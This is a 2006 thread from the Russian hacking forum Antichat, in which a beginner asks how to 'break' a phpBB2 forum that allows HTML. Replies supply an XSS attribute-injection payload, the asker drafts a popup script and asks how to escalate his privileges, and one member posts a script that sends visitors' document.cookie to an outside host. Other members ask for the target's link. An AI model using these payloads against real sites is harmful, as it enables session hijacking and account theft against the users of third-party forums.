HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

PHPbb2 нашел форму где html-тэг ON
  #1  
Старый 18.12.2006, 16:09
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
С нами: 10213542

Репутация: 7
Smile PHPbb2 нашел форму где html-тэг ON

Вто нашел такой форум, где хтмл тэги включены, как можно сломать?
не бейте сильно, я только учусь

Последний раз редактировалось mr-troy; 18.12.2006 в 16:14.. Причина: опечатка
 
Ответить с цитированием

  #2  
Старый 18.12.2006, 17:04
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
С нами: 10246130

Репутация: 141
По умолчанию

xss
Цитата:
<pre a='>' onmouseover='alert(/XSS/)' b='<pre' >
 
Ответить с цитированием

  #3  
Старый 18.12.2006, 17:08
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
С нами: 10213542

Репутация: 7
По умолчанию

Цитата:
Сообщение от delay(0)  
xss
я одном топике ответил данным сообщением, вывелось вот это:
<pre>
а что дальше? можешь в аську стукнуть? или тут написать?
 
Ответить с цитированием

  #4  
Старый 18.12.2006, 19:01
EPIDEM
Banned
Регистрация: 28.12.2005
Сообщений: 221
С нами: 10719045

Репутация: 60
По умолчанию

дай сцылу =)
 
Ответить с цитированием

  #5  
Старый 18.12.2006, 20:10
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
С нами: 10213542

Репутация: 7
По умолчанию

гы..я ломать ничего не хочу
просто хочу понять уязвимость.
 
Ответить с цитированием

  #6  
Старый 18.12.2006, 20:29
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
С нами: 10441826

Репутация: 1686


По умолчанию

эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
 
Ответить с цитированием

  #7  
Старый 18.12.2006, 21:38
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
С нами: 10213542

Репутация: 7
По умолчанию

Цитата:
Сообщение от genom--  
эта уязвимость называется xss -- что расшифоровывается как крос сайт скриптингъъъ -- вообщем можно вставлять --- любой текст -- подумай сам если вставить javascript код -- то браузер его воспримет как код и выполнит --- =) лол
ОО спасибо, т.е вместо скрипта XSS могу любой яваскрипт вставить
а чтобы права расширить свои, какие скрипты посоветуете? )
 
Ответить с цитированием

  #8  
Старый 18.12.2006, 21:47
mr-troy
Новичок
Регистрация: 15.12.2006
Сообщений: 9
С нами: 10213542

Репутация: 7
По умолчанию

<pre a='>' onmouseover='alert(/<script language="JavaScript">
WOweb=window.open("ВЗЛОМ/","mr-troy", "width=200, height=143, toolbar=0, location=0, status=0, menubar=0, scrollbars=0, resizable=0,left=1,top=1")
</script>)' b='<pre' >

Вот так работаеть будет? Типа всплывающее окно.
 
Ответить с цитированием

  #9  
Старый 19.12.2006, 13:08
EPIDEM
Banned
Регистрация: 28.12.2005
Сообщений: 221
С нами: 10719045

Репутация: 60
По умолчанию

дай фсетаки форум =)
ломать не буим но посмеёмся =))
 
Ответить с цитированием

  #10  
Старый 22.12.2006, 10:49
Kaban
Участник форума
Регистрация: 19.03.2006
Сообщений: 286
С нами: 10602689

Репутация: 144
По умолчанию

Цитата:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
читай статьи про XSS, там описано как что сделать...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кинь свой Анекдот TROJ@N Болталка 19 02.11.2009 03:53



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.